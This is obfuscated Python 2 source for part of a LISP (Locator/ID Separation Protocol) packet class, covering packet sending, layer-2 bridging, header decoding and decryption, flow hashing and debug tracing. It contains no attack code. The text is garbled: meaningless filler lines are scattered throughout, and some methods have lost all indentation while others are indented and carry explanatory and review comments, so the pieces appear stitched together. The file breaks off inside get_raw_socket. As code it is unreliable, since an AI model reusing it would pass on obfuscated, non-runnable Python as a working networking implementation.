if 39 - 39: II111iiii * I1IiiI - iIii1I11I1II1
if 25 - 25: OoooooooOO . Ii1I % iII111i . IiII
if 67 - 67: OoooooooOO + I1Ii111 / ooOoO0o
if 75 - 75: IiII / OoooooooOO . I1IiiI + I1Ii111 - II111iiii
if 33 - 33: IiII / IiII . i11iIiiIii * I1ii11iIi11i + o0oOOo0O0Ooo
if 16 - 16: IiII
if 10 - 10: OoOoOO00 . IiII * iIii1I11I1II1 - oO0o - OoOoOO00 / I1Ii111
if ( self . outer_version == 4 or self . inner_version == 4 ) :
if ( lisp_is_macos ( ) ) :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : 6 ] + packet [ 7 ] + packet [ 6 ] + packet [ 8 : : ]
if 13 - 13: oO0o + OoOoOO00 % IiII % OoooooooOO
else :
packet = packet [ 0 : 2 ] + packet [ 3 ] + packet [ 2 ] + packet [ 4 : : ]
if 22 - 22: I1Ii111
if 23 - 23: O0
return ( packet )
if 41 - 41: i1IIi . OOooOOo / ooOoO0o / o0oOOo0O0Ooo % IiII - Ii1I
if 14 - 14: I1ii11iIi11i - i11iIiiIii * I1Ii111
 def send_packet ( self , lisp_raw_socket , dest ) :

  #
  # Send the buffered encapsulated packet (fragmenting it first when
  # needed) out "lisp_raw_socket" to "dest".  "dest" supports
  # print_address_no_iid(), so it is an address object, not a string.
  # sendto() failures are logged and remaining fragments still sent.
  #
  if ( lisp_flow_logging and dest != self . inner_dest ) : self . log_flow ( True )
  if 39 - 39: OoooooooOO
  dest = dest . print_address_no_iid ( )
  IiIIii , i1iIII1IIi = self . fragment ( )
  if 63 - 63: II111iiii . I1Ii111 % IiII + II111iiii
  for iIiI1I in IiIIii :

   #
   # Only when fragmentation actually produced multiple packets do we
   # repoint self.packet at the current fragment and trace it.
   #
   if ( len ( IiIIii ) != 1 ) :
    self . packet = iIiI1I
    self . print_packet ( i1iIII1IIi , True )
   if 81 - 81: OOooOOo - I1IiiI % o0oOOo0O0Ooo
   if 7 - 7: ooOoO0o - i1IIi . OoOoOO00
   try : lisp_raw_socket . sendto ( iIiI1I , ( dest , 0 ) )
   except socket . error , oOo :
    lprint ( "socket.sendto() failed: {}" . format ( oOo ) )
if 12 - 12: IiII / OoO0O00 / O0 * IiII
if 51 - 51: ooOoO0o * iII111i / i1IIi
if 2 - 2: oO0o + IiII . iII111i - i1IIi + I1Ii111
if 54 - 54: OoooooooOO . oO0o - iII111i
def send_l2_packet ( self , l2_socket , mac_header ) :
if ( l2_socket == None ) :
lprint ( "No layer-2 socket, drop IPv6 packet" )
return
if 76 - 76: I1Ii111
if ( mac_header == None ) :
lprint ( "Could not build MAC header, drop IPv6 packet" )
return
if 61 - 61: ooOoO0o / II111iiii * ooOoO0o * OoOoOO00 * I1Ii111 . i11iIiiIii
if 26 - 26: I1Ii111 / ooOoO0o - OoO0O00 . iIii1I11I1II1
IIii1i = mac_header + self . packet
if 83 - 83: ooOoO0o % Ii1I / Oo0Ooo - iII111i / O0
if 97 - 97: iIii1I11I1II1 * I11i
if 95 - 95: OoO0O00
if 68 - 68: iIii1I11I1II1 . iIii1I11I1II1 / OoOoOO00 - II111iiii - iIii1I11I1II1
if 75 - 75: ooOoO0o . I1IiiI * II111iiii
if 99 - 99: iIii1I11I1II1 * I1ii11iIi11i + IiII
if 70 - 70: i1IIi % ooOoO0o . I1ii11iIi11i - IiII + OOooOOo
if 84 - 84: oO0o + II111iiii * II111iiii % o0oOOo0O0Ooo / iII111i + ooOoO0o
if 9 - 9: iII111i
if 25 - 25: OOooOOo - Ii1I . I11i
if 57 - 57: o0oOOo0O0Ooo + Oo0Ooo * I1ii11iIi11i - ooOoO0o % iIii1I11I1II1 - Ii1I
l2_socket . write ( IIii1i )
return
if 37 - 37: OoO0O00 * I11i + Ii1I + I1ii11iIi11i * o0oOOo0O0Ooo
if 95 - 95: Ii1I - i11iIiiIii % i11iIiiIii - O0 * I1Ii111
 def bridge_l2_packet ( self , eid , db ) :

  #
  # Bridge the buffered layer-2 packet out the interface a dynamic-EID
  # was learned on.  Any lookup failure (unknown EID, unknown
  # interface, no bridge socket) silently drops the packet; only
  # send() errors are logged.
  #
  try : Oo0O0oOoO0o0 = db . dynamic_eids [ eid . print_address_no_iid ( ) ]
  except : return
  try : II1i = lisp_myinterfaces [ Oo0O0oOoO0o0 . interface ]
  except : return
  try :
   socket = II1i . get_bridge_socket ( )
   if ( socket == None ) : return
  except : return
  if 21 - 21: I1IiiI - I1IiiI + iII111i % I1IiiI * oO0o

  #
  # NOTE(review): the local name "socket" shadows the socket module
  # here, so "socket . error" below resolves against the bridge-socket
  # object, not the module -- confirm before touching this handler.
  #
  try : socket . send ( self . packet )
  except socket . error , oOo :
   lprint ( "bridge_l2_packet(): socket.send() failed: {}" . format ( oOo ) )
if 74 - 74: iII111i / I11i . I1IiiI - OoooooooOO + II111iiii + I11i
if 36 - 36: Ii1I * I1IiiI * I1ii11iIi11i . I11i * I1ii11iIi11i
if 76 - 76: OOooOOo + O0 / IiII - OoO0O00
def is_lisp_packet ( self , packet ) :
o0oOo00 = ( struct . unpack ( "B" , packet [ 9 ] ) [ 0 ] == LISP_UDP_PROTOCOL )
if ( o0oOo00 == False ) : return ( False )
if 27 - 27: Oo0Ooo - iIii1I11I1II1 * iII111i * II111iiii * I1ii11iIi11i
IiI1iI1 = struct . unpack ( "H" , packet [ 22 : 24 ] ) [ 0 ]
if ( socket . ntohs ( IiI1iI1 ) == LISP_DATA_PORT ) : return ( True )
IiI1iI1 = struct . unpack ( "H" , packet [ 20 : 22 ] ) [ 0 ]
if ( socket . ntohs ( IiI1iI1 ) == LISP_DATA_PORT ) : return ( True )
return ( False )
if 99 - 99: oO0o / i1IIi
if 2 - 2: oO0o . iII111i
 def decode ( self , is_lisp_packet , lisp_ipc_socket , stats ) :

  #
  # Parse self.packet in place.  For a LISP packet this strips and
  # records the outer IP header, the outer UDP header and the LISP
  # header (decrypting the payload when the LISP header carries
  # key-id bits), then parses the inner IPv4/IPv6 (or layer-2 MAC)
  # header.  Returns self on success and None on any error; the
  # failure reason is left in self.packet_error and counted in the
  # "stats" table when one is supplied.
  #
  self . packet_error = ""
  IIii1i = self . packet
  II1II111 = len ( IIii1i )
  OoO00oO0o00 = I11 = True
  if 51 - 51: iII111i / I11i - I11i
  if 65 - 65: OoOoOO00 * O0 - OoOoOO00 - OoO0O00
  if 96 - 96: I1ii11iIi11i - O0
  if 35 - 35: OOooOOo . I11i . I1Ii111 - I11i % I11i + I1Ii111
  oO0oO00 = 0
  o0OoO0000o = 0
  if ( is_lisp_packet ) :

   #
   # Outer IP header.  The version nibble of the first byte selects
   # IPv4 or IPv6 parsing.
   #
   o0OoO0000o = self . lisp_header . get_instance_id ( )
   IiiI1Ii1II = struct . unpack ( "B" , IIii1i [ 0 : 1 ] ) [ 0 ]
   self . outer_version = IiiI1Ii1II >> 4
   if ( self . outer_version == 4 ) :

    #
    # Recompute the IPv4 header checksum; nonzero means corrupt,
    # except that a received checksum field of 0 is tolerated on
    # macOS.
    #
    if 74 - 74: oO0o / OoooooooOO % oO0o / iIii1I11I1II1 + O0
    if 95 - 95: Oo0Ooo * OOooOOo + I1IiiI . O0
    if 36 - 36: OoOoOO00 * OoO0O00 / ooOoO0o / I1IiiI - Ii1I
    if 53 - 53: oO0o
    if 99 - 99: Oo0Ooo
    IiIi1I11 = struct . unpack ( "H" , IIii1i [ 10 : 12 ] ) [ 0 ]
    IIii1i = lisp_ip_checksum ( IIii1i )
    Oo0 = struct . unpack ( "H" , IIii1i [ 10 : 12 ] ) [ 0 ]
    if ( Oo0 != 0 ) :
     if ( IiIi1I11 != 0 or lisp_is_macos ( ) == False ) :
      self . packet_error = "checksum-error"
      if ( stats ) :
       stats [ self . packet_error ] . increment ( II1II111 )
      if 19 - 19: i1IIi / IiII + I1ii11iIi11i * I1ii11iIi11i
      if 90 - 90: OoooooooOO * iII111i . i11iIiiIii . ooOoO0o - I1Ii111
      lprint ( "IPv4 header checksum failed for outer header" )
      if ( lisp_flow_logging ) : self . log_flow ( False )
      return ( None )
    if 81 - 81: I1IiiI / OoooooooOO
    if 52 - 52: oO0o + I1Ii111 * I1Ii111 * Oo0Ooo - iIii1I11I1II1 + I1ii11iIi11i
    if 34 - 34: iII111i / OoO0O00 / Oo0Ooo
    O000oOOoOOO = LISP_AFI_IPV4
    OoO00oo00 = 12
    self . outer_tos = struct . unpack ( "B" , IIii1i [ 1 : 2 ] ) [ 0 ]
    self . outer_ttl = struct . unpack ( "B" , IIii1i [ 8 : 9 ] ) [ 0 ]
    oO0oO00 = 20
   elif ( self . outer_version == 6 ) :
    O000oOOoOOO = LISP_AFI_IPV6
    OoO00oo00 = 8
    IiIi = struct . unpack ( "H" , IIii1i [ 0 : 2 ] ) [ 0 ]
    self . outer_tos = ( socket . ntohs ( IiIi ) >> 4 ) & 0xff
    self . outer_ttl = struct . unpack ( "B" , IIii1i [ 7 : 8 ] ) [ 0 ]
    oO0oO00 = 40
   else :
    self . packet_error = "outer-header-error"
    if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
    lprint ( "Cannot decode outer header" )
    return ( None )
   if 95 - 95: O0 + iIii1I11I1II1 . I1ii11iIi11i
   if 61 - 61: Ii1I * Ii1I
   self . outer_source . afi = O000oOOoOOO
   self . outer_dest . afi = O000oOOoOOO
   O0III1Iiii1i11 = self . outer_source . addr_length ( )
   if 74 - 74: Oo0Ooo / I1Ii111 % I1Ii111 . IiII
   self . outer_source . unpack_address ( IIii1i [ OoO00oo00 : OoO00oo00 + O0III1Iiii1i11 ] )
   OoO00oo00 += O0III1Iiii1i11
   self . outer_dest . unpack_address ( IIii1i [ OoO00oo00 : OoO00oo00 + O0III1Iiii1i11 ] )
   IIii1i = IIii1i [ oO0oO00 : : ]
   self . outer_source . mask_len = self . outer_source . host_mask_len ( )
   self . outer_dest . mask_len = self . outer_dest . host_mask_len ( )
   if 72 - 72: i1IIi
   if 21 - 21: I1Ii111 . OOooOOo / i11iIiiIii * i1IIi
   if 82 - 82: ooOoO0o * Oo0Ooo % i11iIiiIii * i1IIi . OOooOOo
   if 89 - 89: IiII - i1IIi - IiII

   #
   # Outer UDP header: source/dest ports, length, checksum.
   #
   oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 0 : 2 ] ) [ 0 ]
   self . udp_sport = socket . ntohs ( oOOo00OOOO )
   oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 2 : 4 ] ) [ 0 ]
   self . udp_dport = socket . ntohs ( oOOo00OOOO )
   oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 4 : 6 ] ) [ 0 ]
   self . udp_length = socket . ntohs ( oOOo00OOOO )
   oOOo00OOOO = struct . unpack ( "H" , IIii1i [ 6 : 8 ] ) [ 0 ]
   self . udp_checksum = socket . ntohs ( oOOo00OOOO )
   IIii1i = IIii1i [ 8 : : ]
   if 70 - 70: i1IIi - iIii1I11I1II1 - I1Ii111
   if 49 - 49: I1Ii111 / II111iiii
   if 69 - 69: o0oOOo0O0Ooo + I1ii11iIi11i / iIii1I11I1II1 . IiII % I1ii11iIi11i * OoOoOO00
   if 13 - 13: iIii1I11I1II1 + iII111i / Ii1I / i1IIi % OoO0O00 - iIii1I11I1II1

   #
   # Classify: an IP-encapsulated LISP packet vs. an L2/VXLAN one.
   #
   OoO00oO0o00 = ( self . udp_dport == LISP_DATA_PORT or
    self . udp_sport == LISP_DATA_PORT )
   I11 = ( self . udp_dport in ( LISP_L2_DATA_PORT , LISP_VXLAN_DATA_PORT ) )
   if 60 - 60: I1Ii111
   if 77 - 77: I1IiiI / I1ii11iIi11i
   if 95 - 95: I1Ii111 * i1IIi + oO0o
   if 40 - 40: II111iiii

   #
   # LISP data header (8 bytes).
   #
   if ( self . lisp_header . decode ( IIii1i ) == False ) :
    self . packet_error = "lisp-header-error"
    if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
    if 7 - 7: OOooOOo / OoO0O00
    if ( lisp_flow_logging ) : self . log_flow ( False )
    lprint ( "Cannot decode LISP header" )
    return ( None )
   if 88 - 88: i1IIi
   IIii1i = IIii1i [ 8 : : ]
   o0OoO0000o = self . lisp_header . get_instance_id ( )
   oO0oO00 += 16
   if 53 - 53: ooOoO0o . OOooOOo . o0oOOo0O0Ooo + oO0o
   if ( o0OoO0000o == 0xffffff ) : o0OoO0000o = 0
  if 17 - 17: iIii1I11I1II1 + i1IIi . I1ii11iIi11i + Ii1I % i1IIi . oO0o
  if 57 - 57: oO0o
  if 92 - 92: II111iiii - OoO0O00 - OOooOOo % I1IiiI - OoOoOO00 * I1Ii111
  if 16 - 16: iIii1I11I1II1 + OoooooooOO - ooOoO0o * IiII

  #
  # Decrypt the payload when the LISP header's key-id (k_bits) is
  # nonzero; missing keys count as "no-decrypt-key" errors.
  #
  iiI1IiI1I1I = False
  IIIiI1i = self . lisp_header . k_bits
  if ( IIIiI1i ) :
   oo0o00OO = lisp_get_crypto_decap_lookup_key ( self . outer_source ,
    self . udp_sport )
   if ( oo0o00OO == None ) :
    self . packet_error = "no-decrypt-key"
    if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
    if 22 - 22: IiII / OOooOOo
    self . print_packet ( "Receive" , is_lisp_packet )
    O0OOoooO = bold ( "No key available" , False )
    dprint ( "{} for key-id {} to decrypt packet" . format ( O0OOoooO , IIIiI1i ) )
    if ( lisp_flow_logging ) : self . log_flow ( False )
    return ( None )
   if 31 - 31: oO0o % i1IIi . OoooooooOO - o0oOOo0O0Ooo + OoooooooOO
   if 45 - 45: OOooOOo + I11i / OoooooooOO - Ii1I + OoooooooOO
   ii1i1I1111ii = lisp_crypto_keys_by_rloc_decap [ oo0o00OO ] [ IIIiI1i ]
   if ( ii1i1I1111ii == None ) :
    self . packet_error = "no-decrypt-key"
    if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
    if 87 - 87: IiII
    self . print_packet ( "Receive" , is_lisp_packet )
    O0OOoooO = bold ( "No key available" , False )
    dprint ( "{} to decrypt packet from RLOC {}" . format ( O0OOoooO ,
     red ( oo0o00OO , False ) ) )
    if ( lisp_flow_logging ) : self . log_flow ( False )
    return ( None )
   if 32 - 32: OoooooooOO / iII111i / I1Ii111 + iII111i - I11i + II111iiii
   if 11 - 11: OoooooooOO * o0oOOo0O0Ooo + OoooooooOO - I1ii11iIi11i
   if 47 - 47: I1Ii111 % OOooOOo * OoO0O00 . iIii1I11I1II1 % Oo0Ooo + OoooooooOO
   if 2 - 2: I1Ii111 % OoooooooOO - ooOoO0o * I1ii11iIi11i * IiII
   if 99 - 99: iIii1I11I1II1 . Oo0Ooo / ooOoO0o . OOooOOo % I1IiiI * I11i
   ii1i1I1111ii . use_count += 1
   IIii1i , iiI1IiI1I1I = self . decrypt ( IIii1i , oO0oO00 , ii1i1I1111ii ,
    oo0o00OO )
   if ( iiI1IiI1I1I == False ) :
    if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
    if ( lisp_flow_logging ) : self . log_flow ( False )
    return ( None )
  if 95 - 95: oO0o
  if 80 - 80: IiII
  if 42 - 42: OoooooooOO * II111iiii
  if 53 - 53: I1Ii111 + i1IIi . OoO0O00 / i11iIiiIii + Ii1I % OoOoOO00
  if 9 - 9: ooOoO0o . I11i - Oo0Ooo . I1Ii111
  if 39 - 39: OOooOOo

  #
  # Inner header: IPv4, IPv6, MAC (L2/VXLAN), or a control packet
  # (instance-id 0xffffff) with no inner header to parse.
  #
  IiiI1Ii1II = struct . unpack ( "B" , IIii1i [ 0 : 1 ] ) [ 0 ]
  self . inner_version = IiiI1Ii1II >> 4
  if ( OoO00oO0o00 and self . inner_version == 4 and IiiI1Ii1II >= 0x45 ) :
   o00OO00OOo0 = socket . ntohs ( struct . unpack ( "H" , IIii1i [ 2 : 4 ] ) [ 0 ] )
   self . inner_tos = struct . unpack ( "B" , IIii1i [ 1 : 2 ] ) [ 0 ]
   self . inner_ttl = struct . unpack ( "B" , IIii1i [ 8 : 9 ] ) [ 0 ]
   self . inner_protocol = struct . unpack ( "B" , IIii1i [ 9 : 10 ] ) [ 0 ]
   self . inner_source . afi = LISP_AFI_IPV4
   self . inner_dest . afi = LISP_AFI_IPV4
   self . inner_source . unpack_address ( IIii1i [ 12 : 16 ] )
   self . inner_dest . unpack_address ( IIii1i [ 16 : 20 ] )
   iIiIi1i1Iiii = socket . ntohs ( struct . unpack ( "H" , IIii1i [ 6 : 8 ] ) [ 0 ] )
   self . inner_is_fragment = ( iIiIi1i1Iiii & 0x2000 or iIiIi1i1Iiii != 0 )
   if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
    self . inner_sport = struct . unpack ( "H" , IIii1i [ 20 : 22 ] ) [ 0 ]
    self . inner_sport = socket . ntohs ( self . inner_sport )
    self . inner_dport = struct . unpack ( "H" , IIii1i [ 22 : 24 ] ) [ 0 ]
    self . inner_dport = socket . ntohs ( self . inner_dport )
   if 92 - 92: OOooOOo
  elif ( OoO00oO0o00 and self . inner_version == 6 and IiiI1Ii1II >= 0x60 ) :
   o00OO00OOo0 = socket . ntohs ( struct . unpack ( "H" , IIii1i [ 4 : 6 ] ) [ 0 ] ) + 40
   IiIi = struct . unpack ( "H" , IIii1i [ 0 : 2 ] ) [ 0 ]
   self . inner_tos = ( socket . ntohs ( IiIi ) >> 4 ) & 0xff
   self . inner_ttl = struct . unpack ( "B" , IIii1i [ 7 : 8 ] ) [ 0 ]
   self . inner_protocol = struct . unpack ( "B" , IIii1i [ 6 : 7 ] ) [ 0 ]
   self . inner_source . afi = LISP_AFI_IPV6
   self . inner_dest . afi = LISP_AFI_IPV6
   self . inner_source . unpack_address ( IIii1i [ 8 : 24 ] )
   self . inner_dest . unpack_address ( IIii1i [ 24 : 40 ] )
   if ( self . inner_protocol == LISP_UDP_PROTOCOL ) :
    self . inner_sport = struct . unpack ( "H" , IIii1i [ 40 : 42 ] ) [ 0 ]
    self . inner_sport = socket . ntohs ( self . inner_sport )
    self . inner_dport = struct . unpack ( "H" , IIii1i [ 42 : 44 ] ) [ 0 ]
    self . inner_dport = socket . ntohs ( self . inner_dport )
   if 32 - 32: iII111i . iIii1I11I1II1 % Oo0Ooo . OoooooooOO
  elif ( I11 ) :
   o00OO00OOo0 = len ( IIii1i )
   self . inner_tos = 0
   self . inner_ttl = 0
   self . inner_protocol = 0
   self . inner_source . afi = LISP_AFI_MAC
   self . inner_dest . afi = LISP_AFI_MAC
   self . inner_dest . unpack_address ( self . swap_mac ( IIii1i [ 0 : 6 ] ) )
   self . inner_source . unpack_address ( self . swap_mac ( IIii1i [ 6 : 12 ] ) )
  elif ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
   if ( lisp_flow_logging ) : self . log_flow ( False )
   return ( self )
  else :
   self . packet_error = "bad-inner-version"
   if ( stats ) : stats [ self . packet_error ] . increment ( II1II111 )
   if 81 - 81: i11iIiiIii * iII111i . oO0o * oO0o . IiII
   lprint ( "Cannot decode encapsulation, header version {}" . format ( hex ( IiiI1Ii1II ) ) )
   if 47 - 47: iIii1I11I1II1 % I11i . I11i / O0 . i11iIiiIii * Ii1I
   IIii1i = lisp_format_packet ( IIii1i [ 0 : 20 ] )
   lprint ( "Packet header: {}" . format ( IIii1i ) )
   if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
   return ( None )
  if 24 - 24: O0
  self . inner_source . mask_len = self . inner_source . host_mask_len ( )
  self . inner_dest . mask_len = self . inner_dest . host_mask_len ( )
  self . inner_source . instance_id = o0OoO0000o
  self . inner_dest . instance_id = o0OoO0000o
  if 33 - 33: OoooooooOO + oO0o * II111iiii / OOooOOo
  if 87 - 87: OoooooooOO
  if 1 - 1: iIii1I11I1II1 / o0oOOo0O0Ooo
  if 98 - 98: O0 % I1IiiI / OoooooooOO * I1ii11iIi11i - oO0o
  if 51 - 51: iII111i + I11i

  #
  # Nonce-echo processing: answer an echo request (E-bit set) or
  # consume an echoed nonce we previously requested.
  #
  if ( lisp_nonce_echoing and is_lisp_packet ) :
   Oo0ooO0O0o00o = lisp_get_echo_nonce ( self . outer_source , None )
   if ( Oo0ooO0O0o00o == None ) :
    o0O00oo0O = self . outer_source . print_address_no_iid ( )
    Oo0ooO0O0o00o = lisp_echo_nonce ( o0O00oo0O )
   if 75 - 75: Ii1I + ooOoO0o / OoooooooOO
   oOO000 = self . lisp_header . get_nonce ( )
   if ( self . lisp_header . is_e_bit_set ( ) ) :
    Oo0ooO0O0o00o . receive_request ( lisp_ipc_socket , oOO000 )
   elif ( Oo0ooO0O0o00o . request_nonce_sent ) :
    Oo0ooO0O0o00o . receive_echo ( lisp_ipc_socket , oOO000 )
  if 47 - 47: iIii1I11I1II1 + OoO0O00 % iIii1I11I1II1 . ooOoO0o / Oo0Ooo - i11iIiiIii
  if 80 - 80: I1ii11iIi11i / O0 / iIii1I11I1II1 + I1IiiI
  if 3 - 3: ooOoO0o / i1IIi - OoOoOO00
  if 73 - 73: OoooooooOO * O0 * ooOoO0o
  if 7 - 7: II111iiii + i1IIi
  if 95 - 95: i11iIiiIii + OoooooooOO / OOooOOo - iIii1I11I1II1 + iIii1I11I1II1
  if 29 - 29: IiII % ooOoO0o + OoO0O00 . i1IIi + I1IiiI

  #
  # If we decrypted, append the decrypted payload (up to the parsed
  # inner length) back onto the already-consumed headers.
  #
  if ( iiI1IiI1I1I ) : self . packet += IIii1i [ : o00OO00OOo0 ]
  if 24 - 24: I1Ii111 / Ii1I * I1ii11iIi11i - OoooooooOO / I1IiiI . oO0o
  if 98 - 98: i1IIi - iII111i
  if 49 - 49: o0oOOo0O0Ooo . Ii1I . oO0o
  if 9 - 9: IiII - II111iiii * OoO0O00
  if ( lisp_flow_logging and is_lisp_packet ) : self . log_flow ( False )
  return ( self )
if 78 - 78: iIii1I11I1II1 / O0 * oO0o / iII111i / OoOoOO00
if 15 - 15: ooOoO0o / oO0o
def swap_mac ( self , mac ) :
return ( mac [ 1 ] + mac [ 0 ] + mac [ 3 ] + mac [ 2 ] + mac [ 5 ] + mac [ 4 ] )
if 54 - 54: ooOoO0o - iIii1I11I1II1 - I11i % Ii1I / II111iiii
if 80 - 80: i11iIiiIii % iIii1I11I1II1 / i11iIiiIii
def strip_outer_headers ( self ) :
OoO00oo00 = 16
OoO00oo00 += 20 if ( self . outer_version == 4 ) else 40
self . packet = self . packet [ OoO00oo00 : : ]
return ( self )
if 66 - 66: OoOoOO00 . iIii1I11I1II1 * I1ii11iIi11i - Ii1I - iIii1I11I1II1
if 28 - 28: OoOoOO00 % OoooooooOO
def hash_ports ( self ) :
IIii1i = self . packet
IiiI1Ii1II = self . inner_version
I1I = 0
if ( IiiI1Ii1II == 4 ) :
iIIIIi1iiI = struct . unpack ( "B" , IIii1i [ 9 ] ) [ 0 ]
if ( self . inner_is_fragment ) : return ( iIIIIi1iiI )
if ( iIIIIi1iiI in [ 6 , 17 ] ) :
I1I = iIIIIi1iiI
I1I += struct . unpack ( "I" , IIii1i [ 20 : 24 ] ) [ 0 ]
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
if 57 - 57: I11i . O0 . OoooooooOO . I1Ii111 - Ii1I / ooOoO0o
if 34 - 34: OoOoOO00 % o0oOOo0O0Ooo - oO0o
if ( IiiI1Ii1II == 6 ) :
iIIIIi1iiI = struct . unpack ( "B" , IIii1i [ 6 ] ) [ 0 ]
if ( iIIIIi1iiI in [ 6 , 17 ] ) :
I1I = iIIIIi1iiI
I1I += struct . unpack ( "I" , IIii1i [ 40 : 44 ] ) [ 0 ]
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
if 40 - 40: iII111i
if 82 - 82: I1Ii111 . i1IIi / oO0o
return ( I1I )
if 56 - 56: iII111i
if 23 - 23: i1IIi
def hash_packet ( self ) :
I1I = self . inner_source . address ^ self . inner_dest . address
I1I += self . hash_ports ( )
if ( self . inner_version == 4 ) :
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
elif ( self . inner_version == 6 ) :
I1I = ( I1I >> 64 ) ^ ( I1I & 0xffffffffffffffff )
I1I = ( I1I >> 32 ) ^ ( I1I & 0xffffffff )
I1I = ( I1I >> 16 ) ^ ( I1I & 0xffff )
if 24 - 24: IiII
self . udp_sport = 0xf000 | ( I1I & 0xfff )
if 51 - 51: OOooOOo % i11iIiiIii
if 77 - 77: OOooOOo % i11iIiiIii - I1ii11iIi11i
 def print_packet ( self , s_or_r , is_lisp_packet ) :

  #
  # Trace one packet to the debug log.  "s_or_r" is a direction label
  # ("Send", "Receive", "Replicate", "Fragment-..."); non-LISP packets
  # get a short inner-header line, LISP packets a full outer+inner
  # line (or an outer-only line for control packets, instance-id
  # 0xffffff).
  #
  if ( is_lisp_packet == False ) :
   I1 = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
    self . inner_dest . print_address ( ) )
   dprint ( ( "{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..." ) . format ( bold ( s_or_r , False ) ,
   # IiII + i1IIi . I1Ii111 - I11i
    green ( I1 , False ) , self . inner_tos ,
    self . inner_ttl , len ( self . packet ) ,
    lisp_format_packet ( self . packet [ 0 : 60 ] ) ) )
   return
  if 29 - 29: OoooooooOO - oO0o / I1IiiI + II111iiii
  if 12 - 12: oO0o . OOooOOo

  #
  # Map the direction label onto an encap/decap tag for the header
  # summary line.
  #
  if ( s_or_r . find ( "Receive" ) != - 1 ) :
   oo00 = "decap"
   oo00 += "-vxlan" if self . udp_dport == LISP_VXLAN_DATA_PORT else ""
  else :
   oo00 = s_or_r
   if ( oo00 in [ "Send" , "Replicate" ] or oo00 . find ( "Fragment" ) != - 1 ) :
    oo00 = "encap"
  if 88 - 88: I11i - iII111i
  if 68 - 68: Oo0Ooo % oO0o . IiII - o0oOOo0O0Ooo / i1IIi / OoooooooOO
  i1II11II11 = "{} -> {}" . format ( self . outer_source . print_address_no_iid ( ) ,
   self . outer_dest . print_address_no_iid ( ) )
  if 94 - 94: iIii1I11I1II1
  if 1 - 1: O0
  if 2 - 2: OoO0O00 . I11i
  if 97 - 97: Oo0Ooo
  if 65 - 65: Oo0Ooo % OOooOOo / i11iIiiIii / iIii1I11I1II1 . I1Ii111 + ooOoO0o
  if ( self . lisp_header . get_instance_id ( ) == 0xffffff ) :
   oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, " )
   if 92 - 92: oO0o
   oOOo0ooO0 += bold ( "control-packet" , False ) + ": {} ..."
   if 96 - 96: I1Ii111 * iIii1I11I1II1 / OoOoOO00 % OOooOOo * II111iiii
   dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( i1II11II11 , False ) ,
    self . outer_tos , self . outer_ttl , self . udp_sport ,
    self . udp_dport , lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
   return
  else :
   oOOo0ooO0 = ( "{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + "{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + "inner tos/ttl: {}/{}, length: {}, {}, packet: {} ..." )
  if 3 - 3: OOooOOo . Oo0Ooo / i11iIiiIii + OoO0O00
  if 47 - 47: IiII . OOooOOo
  if 96 - 96: I11i % II111iiii / ooOoO0o % OOooOOo / ooOoO0o % i11iIiiIii
  if 57 - 57: I11i - I11i % II111iiii % Oo0Ooo . o0oOOo0O0Ooo % Oo0Ooo

  # Encrypted payloads get a combined encrypt/encap (or decap/decrypt)
  # tag.
  if ( self . lisp_header . k_bits ) :
   if ( oo00 == "encap" ) : oo00 = "encrypt/encap"
   if ( oo00 == "decap" ) : oo00 = "decap/decrypt"
  if 91 - 91: I1IiiI - OoO0O00 - Oo0Ooo - Ii1I * iIii1I11I1II1
  if 68 - 68: OoO0O00 % O0 * iIii1I11I1II1 / oO0o * o0oOOo0O0Ooo + OOooOOo
  I1 = "{} -> {}" . format ( self . inner_source . print_address ( ) ,
   self . inner_dest . print_address ( ) )
  if 89 - 89: ooOoO0o * I1IiiI . oO0o
  dprint ( oOOo0ooO0 . format ( bold ( s_or_r , False ) , red ( i1II11II11 , False ) ,
   self . outer_tos , self . outer_ttl , self . udp_sport , self . udp_dport ,
   green ( I1 , False ) , self . inner_tos , self . inner_ttl ,
   len ( self . packet ) , self . lisp_header . print_header ( oo00 ) ,
   lisp_format_packet ( self . packet [ 0 : 56 ] ) ) )
if 75 - 75: ooOoO0o - iII111i % iII111i + ooOoO0o * o0oOOo0O0Ooo - I1ii11iIi11i
if 26 - 26: I11i * Ii1I % I1IiiI + iII111i
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . inner_source , self . inner_dest ) )
if 38 - 38: iII111i - Oo0Ooo / Ii1I + oO0o . iII111i + IiII
if 19 - 19: Ii1I
def get_raw_socket ( self ) :
o0OoO0000o = str ( self . lisp_header . get_instance_id ( ) )
if ( o0OoO0000o == "0" ) : return ( None )
if ( lisp_iid_to_interface . has_key ( o0OoO0000o ) == False ) : return ( None )
if 51 - 51: iIii1I11I1II1
II1i = lisp_iid_to_interface [ o0OoO0000o ]
IiII1iiI = II1i . get_socket ( )
if ( IiII1iiI == None ) :
iI = bold ( "SO_BINDTODEVICE" , False )
II1I = ( os . getenv ( "LISP_ENFORCE_BINDTODEVICE" ) != None )
lprint ( "{} required for multi-tenancy support, {} packet" . format ( iI , "drop" if II1I else "forward" ) )
if 10 - 10: i11iIiiIii . OoooooooOO . O0 % ooOoO0o / OoO0O00
if ( II1I ) : return ( None )
if 36 - 36: I1IiiI % i1IIi + OoO0O00
if 59 - 59: i11iIiiIii - i11iIiiIii + I1IiiI
o0OoO0000o = bold ( o0OoO0000o , False )
